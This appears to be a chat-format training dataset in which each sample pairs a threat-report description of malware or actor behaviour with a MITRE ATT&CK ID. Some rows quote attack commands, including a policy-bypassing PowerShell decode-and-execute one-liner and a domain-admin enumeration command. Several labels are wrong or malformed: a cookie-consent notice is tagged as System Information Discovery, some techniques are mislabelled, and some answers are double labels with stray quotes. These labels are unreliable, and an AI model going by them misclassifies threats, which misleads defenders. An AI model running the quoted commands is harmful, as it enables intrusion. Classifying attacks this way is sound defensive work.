- {
- "role": "user",
- "content": "Turla has used WMI event filters and consumers to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1546.003 - Event Triggered Execution: Windows Management Instrumentation Event Subscription"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ramsay can schedule tasks via the Windows COM API to maintain persistence."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If running in a Windows environment, Kazuar saves a DLL to disk that is injected into the explorer.exe process to execute the payload. Kazuar can also be configured to inject and execute within specific processes."
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UBoatRAT can start a command shell."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "These cookies are necessary for the website to function and cannot be switched off in our systems. They are usually only set in response to actions made by you which amount to a request for services, such as setting your privacy preferences, logging in or filling in forms. You can set your browser to block or alert you about these cookies, but some parts of the site will not then work. These cookies do not store any personally identifiable information"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Calisto has the capability to upload and download files to the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AppleJeus has created a scheduled SYSTEM task that runs when a user logs in."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HermeticWiper has the ability to deploy through an infected system's default domain policy."
- },
- {
- "role": "assistant",
- "content": "T1484.001 - Domain Policy Modification: Group Policy Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TEMP.Veles has used scheduled task XML triggers."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Metamorfo has searched the compromised system for banking applications."
- },
- {
- "role": "assistant",
- "content": "T1518 - Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Additionally malware reports itself to its hardcoded command and control servers and established a backdoor connection, so the attacker may have a permanent remote connection"
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "119 readFiles Obtains file information on a file or a folder, and supports a “*” wildcard and recursive file list"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FatDuke can secure delete its DLL."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When the newer service variant of BitPaymer is run, it first determines if it is being executed from an alternate data stream. If it is not executed from an alternate data stream, the malware creates a file in the %APPDATA% folder with a random file name between three and eight characters long, containing uppercase and lowercase letters as well as numbers. It then copies itself to the alternate data stream :bin of the newly created file and creates a new process from the stream"
- },
- {
- "role": "assistant",
- "content": "T1564.004 - Hide Artifacts: NTFS File Attributes"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kazuar can install itself as a new service."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Upon execution in a vulnerable environment, the PowerShell based payload takes over"
- },
- {
- "role": "assistant",
- "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PHOREAL is capable of creating reverse shell."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "spearphished victims via Facebook and Whatsapp."
- },
- {
- "role": "assistant",
- "content": "T1566.003 - Spearphishing via Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Like the function name says Invoke-ReflectivePEInjection loads an portable executable (PE) file or DLL into the current or remote process memory and executes this file in memory."
- },
- {
- "role": "assistant",
- "content": "T1620 - Reflective Code Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Moses Staff has used batch scripts that can enable SMB on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of enumerating and making modifications to an infected system's Registry."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WastedLocker will attempt to encrypt files on local as well as remote (network adjacent and accessible) and removable drives"
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gh0st RAT has used Zlib to compress C2 communications data before encrypting it."
- },
- {
- "role": "assistant",
- "content": "T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "renames one of its .dll files to uxtheme.dll in an apparent attempt to masquerade as a legitimate file."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can use Windows Authentication Packages for persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.002 - Authentication Package"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Doki has downloaded scripts from C2."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Screenshot: takes system screenshots and saves them to %AppData% before sending them to the C2 via a POST request"
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AppleSeed has the ability to rename its payload to ESTCommon.dll to masquerade as a DLL belonging to ESTsecurity."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Unlike recent variants of Mirai and Gafgyt that target vulnerable Linux systems via randomly generated IP addresses, Xbash also scans and trawls through domain names. The C&C scans for specific destinations’ known vulnerabilities in Hadoop, Redis and ActiveMQ (CVE-2016-3088) for self-propagation. Hadoop’s unauthenticated command execution flaw discovered in October 2016, as well as the Redis arbitrary and remote command execution vulnerability disclosed in October 2015, have yet to be assigned CVE numbers. Based on the active C&C traffic, it scans and probes for open TCP or UDP ports such as HTTP, VNC, MySQL/MariaDB, Telnet, FTP, MongoDB, RDP, ElasticSearch, Oracle Database, CouchDB, Rlogin and PostgreSQL. While the malware uses a weak username and password dictionary to brute force itself into the service, it is also able to update its set from the C&C server, delete all the databases, and display the ransom message"
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "STARWHALE has the ability to execute commands via `cmd.exe`."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RunningRAT gathers the OS version, logical drives information, processor information, and volume information."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses command line for execution."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The main function performed by the SCT file is to Base64 decode the contents of WindowsDefender.ini file and execute the decoded PowerShell Script using the following command line: powershell.exe -exec Bypass -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\\\\ProgramData\\\\WindowsDefender.ini) The rest of the malicious activities are performed by the PowerShell Script"
- },
- {
- "role": "assistant",
- "content": "T1546.013 - Event Triggered Execution: PowerShell Profile', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During C0015, the threat actors use the command `net group \"domain admins\" /dom` to enumerate domain groups."
- },
- {
- "role": "assistant",
- "content": "T1069.002 - Permission Groups Discovery: Domain Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rocke has used shell scripts which download mining executables and saves them with the filename \"java\"."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SILENTTRINITY can use the `GetRegValue` function to check Registry keys within `HKCU\\Software\\Policies\\Microsoft\\Windows\\Installer\\AlwaysInstallElevated` and `HKLM\\Software\\Policies\\Microsoft\\Windows\\Installer\\AlwaysInstallElevated`. It also contains additional modules that can check software AutoRun values and use the Win32 namespace to get values from HKCU, HKLM, HKCR, and HKCC hives."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The malware checks the language of the machine with function “GetUserDefaultUILanguage” and saves the value in the stack; it is not checked automatically after the call, but it is important later"
- },
- {
- "role": "assistant",
- "content": "T1614.001 - System Location Discovery: System Language Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "1) Resolves WINAPI functions 2) Hides its GUI using ShowWindow WINAPI call 3) Compares if the DLL is being ran by wmplayer"
- },
- {
- "role": "assistant",
- "content": "T1564.003 - Hide Artifacts: Hidden Window"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DustySky has used both HTTP and HTTPS for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "\"beacon\" payload can collect information on process details."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RDAT can issue SOAP requests to delete already processed C2 emails. RDAT can also delete itself from the infected system."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "To operate and evade standard analysis tools, most of the functions are hashed"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bundlore uses HTTP requests for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TeamTNT has aggregated collected credentials in text files before exfiltrating."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Spark has used a custom XOR algorithm to decrypt the payload."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "establishes persistence under the Registry key HKCU\\Software\\Run auto_update."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SpeakUp downloads and executes additional files from a remote server."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Naid collects a unique identifier (UID) from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Helminth relies on the following shortcut for persistence, as it runs the Trojan each time the system starts using the following command line"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SoreFang can collect the TCP/IP, DNS, DHCP, and network adapter configuration on a compromised host via \"ipconfig.exe /all\"."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QuasarRAT can perform webcam viewing."
- },
- {
- "role": "assistant",
- "content": "T1125 - Video Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Next, BoomBox downloads an encrypted file from Dropbox. For demonstration purposes, an example HTTP(s) POST request used to download the encrypted file from Dropbox is shown below"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gathers the current domain the victim system belongs to."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "There are likely differences in the Skeleton Key malware documented by Dell SecureWorks and the Mimikatz skeleton key functionality. If all the DCs don’t have skeleton key configured, the master password won’t work when the client authenticates to a DC without skeleton key. Scenario: Either the attacker exploits MS14-068 or has the KRBTGT NTLM password hash and uses it to generate a Kerberos Golden Ticket to impersonate a valid Domain Admin account. Domain Controller Security Events When Implanting the Mimikatz Skeleton Key: When implanting the skeleton key remotely using Mimikatz the following events are logged on the Domain Controller. Authenticating with the Mimikatz Skeleton Key: Testing user password and user account with skeleton key password. Note that both passwords are accepted – the valid user password and the skeleton key master password. Testing Domain Admin account with password & skeleton key password. Note that both passwords are accepted – the valid user password and the skeleton key master password. Skeleton Key Mitigation: - Protect domain-level admin (DLA) accounts (Domain Admin, Administrators, etc) which reduces the risk of attackers gaining access to these credentials. Don’t let DLA accounts logon to systems at a different security level from Domain Controllers"
- },
- {
- "role": "assistant",
- "content": "T1098 - Account Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can capture a screenshot from a victim."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GeminiDuke uses HTTP and HTTPS for command and control."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Higaisa sent the victim computer identifier in a User-Agent string back to the C2 server every 10 minutes."
- },
- {
- "role": "assistant",
- "content": "T1029 - Scheduled Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mofang's spearphishing emails required a user to click the link to connect to a compromised website."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Brave Prince gathers file and directory information from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This thread searches for for files with the following extensions on fixed drives and sends them to C2 every 60 minutes"
- },
- {
- "role": "assistant",
- "content": "T1020 - Automated Exfiltration"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BlackEnergy has run a keylogger plug-in on a victim."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pandora can communicate over HTTP."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During CostaRicto, the threat actors obtained open source tools to use in their operations."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The QuietSieve malware family refers to a series of heavily-obfuscated .NET binaries specifically designed to steal information from the target host. If this check succeeds, a randomly-generated alphanumeric prefix is created and combined with the callback domain as a subdomain before an initial request is made over HTTPS"
- },
- {
- "role": "assistant",
- "content": "T1016.001 - System Network Configuration Discovery: Internet Connection Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bumblebee has the ability to search for designated file paths and Registry keys that indicate a virtualized environment from multiple products."
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PcShare can search the registry files of a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When the backdoor is configured to use HTTPS to communicate with the C2, the functionality is largely the same as when in HTTP mode. The differences are that it lacks the options to update a session key due to encryption being handled by the TLS layer and it also does not have the option to send data to and from the C2 in the chunking mode previously described. In addition, only one transmission is made to the C2 when the malware is establishing a connection as there is no exchange of an AES session key. The hello message that is sent contains the same plaintext data as the HTTP mode"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attackers manually send a command to the JS or C# component to drop and execute a batch file from one of their servers. That batch file writes a malicious INF file and supplies it as a parameter to the Microsoft utility cmstp.exe, which executes a remote scriptlet specified in the INF file. The remote scriptlet contains obfuscated JS code that drops an OCX file and executes it via regsvr32.exe"
- },
- {
- "role": "assistant",
- "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Catchamas steals data stored in the clipboard."
- },
- {
- "role": "assistant",
- "content": "T1115 - Clipboard Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can perform pass the hash."
- },
- {
- "role": "assistant",
- "content": "T1550.002 - Use Alternate Authentication Material: Pass the Hash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Egregor has checked for the LogMein event log in an attempt to encrypt files in remote machines."
- },
- {
- "role": "assistant",
- "content": "T1219 - Remote Access Software"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Net Crawler uses Windows admin shares to establish authenticated sessions to remote systems over SMB as part of lateral movement."
- },
- {
- "role": "assistant",
- "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
